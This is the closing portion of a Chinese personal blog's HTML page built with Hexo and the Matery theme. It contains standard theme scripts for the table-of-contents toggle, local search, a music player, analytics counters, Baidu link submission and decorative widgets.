        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    
        <link rel="stylesheet" href="/libs/aplayer/APlayer.min.css">
<style>
    .aplayer .aplayer-lrc p {
        
        display: none;
        
        font-size: 12px;
        font-weight: 700;
        line-height: 16px !important;
    }

    .aplayer .aplayer-lrc p.aplayer-lrc-current {
        
        display: none;
        
        font-size: 15px;
        color: #42b983;
    }

    
    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body {
        left: -66px !important;
    }

    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body:hover {
        left: 0px !important;
    }

    
</style>
<div class="">
    
    <div class="row">
        <meting-js class="col l8 offset-l2 m10 offset-m1 s12"
                   server="netease"
                   type="playlist"
                   id="3537362132"
                   fixed='true'
                   autoplay='false'
                   theme='#42b983'
                   loop='all'
                   order='random'
                   preload='auto'
                   volume='0.7'
                   list-folded='true'
        >
        </meting-js>
    </div>
</div>

<script src="/libs/aplayer/APlayer.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/meting@2/dist/Meting.min.js"></script>

    

    <div class="container row center-align"
         style="margin-bottom: 0px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            
                <span id="year">2021-2022</span>
            
            <span id="year">2021</span>
            <a href="/about" target="_blank">leaves</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            <br>
            
            
            
                
            
            
                <span id="busuanzi_container_site_pv">
                &nbsp;|&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;
                    <span id="busuanzi_value_site_pv" class="white-color"></span>
            </span>
            
            
                <span id="busuanzi_container_site_uv">
                &nbsp;|&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;
                    <span id="busuanzi_value_site_uv" class="white-color"></span>
            </span>
            
            <br>

            <!-- 运行天数提醒. -->
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">
    <a href="https://github.com/GreenLeavesl" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
        <i class="fab fa-github"></i>
    </a>















    <a href="/atom.xml" class="tooltipped" target="_blank" data-tooltip="RSS 订阅" data-position="top" data-delay="50">
        <i class="fas fa-rss"></i>
    </a>

</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script type="text/javascript">
$(function () {
    var searchFunc = function (path, search_id, content_id) {
        'use strict';
        $.ajax({
            url: path,
            dataType: "xml",
            success: function (xmlResponse) {
                // get the contents from search data
                var datas = $("entry", xmlResponse).map(function () {
                    return {
                        title: $("title", this).text(),
                        content: $("content", this).text(),
                        url: $("url", this).text()
                    };
                }).get();
                var $input = document.getElementById(search_id);
                var $resultContent = document.getElementById(content_id);
                $input.addEventListener('input', function () {
                    var str = '<ul class=\"search-result-list\">';
                    var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                    $resultContent.innerHTML = "";
                    if (this.value.trim().length <= 0) {
                        return;
                    }
                    // perform local searching
                    datas.forEach(function (data) {
                        var isMatch = true;
                        var data_title = data.title.trim().toLowerCase();
                        var data_content = data.content.trim().replace(/<[^>]+>/g, "").toLowerCase();
                        var data_url = data.url;
                        data_url = data_url.indexOf('/') === 0 ? data.url : '/' + data_url;
                        var index_title = -1;
                        var index_content = -1;
                        var first_occur = -1;
                        // only match artiles with not empty titles and contents
                        if (data_title !== '' && data_content !== '') {
                            keywords.forEach(function (keyword, i) {
                                index_title = data_title.indexOf(keyword);
                                index_content = data_content.indexOf(keyword);
                                if (index_title < 0 && index_content < 0) {
                                    isMatch = false;
                                } else {
                                    if (index_content < 0) {
                                        index_content = 0;
                                    }
                                    if (i === 0) {
                                        first_occur = index_content;
                                    }
                                }
                            });
                        }
                        // show search results
                        if (isMatch) {
                            str += "<li><a href='" + data_url + "' class='search-result-title'>" + data_title + "</a>";
                            var content = data.content.trim().replace(/<[^>]+>/g, "");
                            if (first_occur >= 0) {
                                // cut out 100 characters
                                var start = first_occur - 20;
                                var end = first_occur + 80;
                                if (start < 0) {
                                    start = 0;
                                }
                                if (start === 0) {
                                    end = 100;
                                }
                                if (end > content.length) {
                                    end = content.length;
                                }
                                var match_content = content.substr(start, end);
                                // highlight all keywords
                                keywords.forEach(function (keyword) {
                                    var regS = new RegExp(keyword, "gi");
                                    match_content = match_content.replace(regS, "<em class=\"search-keyword\">" + keyword + "</em>");
                                });

                                str += "<p class=\"search-result\">" + match_content + "...</p>"
                            }
                            str += "</li>";
                        }
                    });
                    str += "</ul>";
                    $resultContent.innerHTML = str;
                });
            }
        });
    };

    searchFunc('/search.xml', 'searchInput', 'searchResult');
});
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    <script src="/libs/others/clicklove.js" async="async"></script>
    
    
    <script async src="/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

    <!--腾讯兔小巢-->
    
    

    

    

    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    
        
    <!-- 雪花特效 --> 
     
    <script type="text/javascript" src="/libs/others/snow.js"></script> 
    

    <!--浏览器搞笑标题-->
    <script type="text/javascript" src="/js/FunnyTitle.js"></script>

<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"/live2dw/assets/hibiki.model.json"},"display":{"position":"right","width":150,"height":300},"mobile":{"show":true},"log":false});</script></body>

</html>
